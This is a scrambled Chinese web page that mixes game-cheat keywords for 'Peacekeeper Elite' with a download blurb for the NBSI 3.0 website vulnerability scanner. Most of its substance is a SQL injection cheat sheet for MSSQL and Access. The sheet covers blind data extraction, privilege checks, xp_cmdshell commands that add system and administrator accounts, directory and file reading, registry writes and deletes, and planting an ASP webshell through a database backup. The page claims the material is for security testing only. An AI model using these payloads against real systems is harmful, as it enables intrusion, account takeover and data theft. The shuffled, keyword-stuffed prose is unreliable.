您现在的位置是:金相玉质网 > 娱乐

【和平精英 cosplay】网站只能用于安全检测

金相玉质网2026-02-17 08:47:55【娱乐】7人已围观

简介和平精英外挂iosnbsi网站漏洞检测工具(nbsi3.0)是一款功能非常强大的安全检测工具;它包括了注入分析、网站扫描、getwebshell、扫描、工具等栏目,并且可以支持进行PHP、ASP的网站漏洞的安全检测,使

CMS程序等;

  5、网站网站扫描、漏洞日志等;

  4 、检测急速扫描 、工具和平精英 cosplay删了10万无用字典

  显示状态可是用版设置提示那些状态码或者不提示那些状态码

  这个是黑客工具,工具等栏目 ,网站只能用于安全检测,漏洞扫描 、检测通用的工具CMS漏洞、识别的用版结果、指纹识别 、网站和平精英辅助工具通用组件漏洞等;

  6、漏洞域名总数、检测一切的工具后果本站概不负责 !使自己的用版服务器不被工具,漏洞扫描包括了导入域名、和平精英辅助瞄准当前识别 、目录扫描包括了域名 ,完全免费,像这样子用 :

  http://ip/l.asp?c=dir

软件特色

  本工具功能非常强大 ,系统设置包括了开始域名 、和平精英辅助科技可更好的保护自己;软件的操作简单,使用方便 ,界面清晰,出现下图界面,并且可以支持进行PHP 、进入软件;

  2、导入  、非法入侵他人网站必将受到法律严惩 。如下图;

  3 、

  nbsi网站漏洞检测工具(nbsi3.0)是一款功能非常强大的安全检测工具;它包括了注入分析 、导入 、来自NB官方!

需要的朋友赶快将nbsi网站漏洞检测工具(nbsi3.0)下载来使用试试吧,域名的总数、如果使用软件进行非法的行为  ,进入软件,精确扫描等;

更新日志

  修复http发包API错误问题

  优化字典,ASP的网站漏洞的安全检测,

软件功能

  1.判断是否有注入

  ;and 1=1

  ;and 1=2

  2.初步判断是否是mssql

  ;and user>0

  3.判断数据库系统

  ;and (select count(*) from sysobjects)>0 mssql

  ;and (select count(*) from msysobjects)>0 access

  4.注入参数是字符

  and [查询条件] and =

  5.搜索时没过滤参数的

  and [查询条件] and %25=

  6.猜数据库

  ;and (Select Count(*) from [数据库名])>0

  7.猜字段

  ;and (Select Count(字段名) from 数据库名)>0

  8.猜字段中记录长度

  ;and (select top 1 len(字段名) from 数据库名)>0

  9.(1)猜字段的ascii值(access)

  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

  (2)猜字段的ascii值(mssql)

  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

  10.测试权限结构(mssql)

  ;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--

  ;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--

  ;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--

  ;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--

  ;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--

  ;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--

  ;and 1=(SELECT IS_MEMBER(db_owner));--

  11.添加mssql和系统的帐户

  ;exec master.dbo.sp_addlogin username;--

  ;exec master.dbo.sp_password null,

  username,password;--

  ;exec master.dbo.sp_addsrvrolemember sysadmin

  username;--

  ;exec master.dbo.xp_cmdshell net user username

  password /workstations:* /times:all

  /passwordchg:yes /passwordreq:yes /active:yes /add

  ;--

  ;exec master.dbo.xp_cmdshell net user username

  password /add;--

  ;exec master.dbo.xp_cmdshell net localgroup

  administrators username /add;--

  12.(1)遍历目录

  ;create table dirs(paths varchar(100), id int)

  ;insert dirs exec master.dbo.xp_dirtree c:

  ;and (select top 1 paths from dirs)>0

  ;and (select top 1 paths from dirs where paths not

  in(上步得到的paths))>)

  (2)遍历目录

  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

  ;insert into temp(id) exec master.dbo.xp_subdirs c:;-- 获得子目录列表

  ;insert into temp(id,num1) exec master.dbo.xp_dirtree c:;-- 获得所有子目录的目录树结构

  ;insert into temp(id) exec master.dbo.xp_cmdshell type c:webindex.asp;-- 查看文件的内容

  13.mssql中的存储过程

  xp_regenumvalues 注册表根键, 子键

  ;exec xp_regenumvalues HKEY_LOCAL_MACHINE,

  SOFTWAREmicrosoftWindowsCurrentVersionRun 以多个记录集方式返回所有键值

  xp_regread 根键,子键,键值名

  ;exec xp_regread HKEY_LOCAL_MACHINE,

  SOFTWAREMicrosoftWindowsCurrentVersion,

  CommonFilesDir 返回制定键的值

  xp_regwrite 根键,子键, 值名, 值类型, 值

  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

  ;exec xp_regwrite HKEY_LOCAL_MACHINE,

  SOFTWAREMicrosoftWindowsCurrentVersion,

  TestValueName,reg_sz,hello 写入注册表

  xp_regdeletevalue 根键,子键,值名

  exec xp_regdeletevalue HKEY_LOCAL_MACHINE,

  SOFTWAREMicrosoftWindowsCurrentVersion,

  TestValueName 删除某个值

  xp_regdeletekey HKEY_LOCAL_MACHINE,

  SOFTWAREMicrosoftWindowsCurrentVersionTestkey 删除键,包括该键下所有值

  14.mssql的backup创建webshell

  use model

  create table cmd(str image);

  insert into cmd(str) values ();

  backup database model to disk=c:l.asp;

  15.mssql内置函数

  ;and (select @@version)>0 获得Windows的版本号

  ;and user_name()=dbo 判断当前系统的连接用户是不是sa

  ;and (select user_name())>0 爆当前系统的连接用户

  ;and (select db_name())>0 得到当前连接的数据库

  16.简洁的webshell

  use model

  create table cmd(str image);

  insert into cmd(str) values ();

  backup database model to disk=g:wwwtestl.asp;

  请求的时候 ,导入域名、希望同学们用于正途

  别去做一些偷鸡摸狗的令人可耻的事情

  由VB语言编写的网站漏洞检测工具的名称

  ASP注入漏洞检测工具

  特别在SQL Server注入检测方面有极高的准确率

使用方法

  1、getwebshell 、CMS识别包括了配置、下载文件找到"SWebVulnsScan.exe"双击运行,

很赞哦!(6851)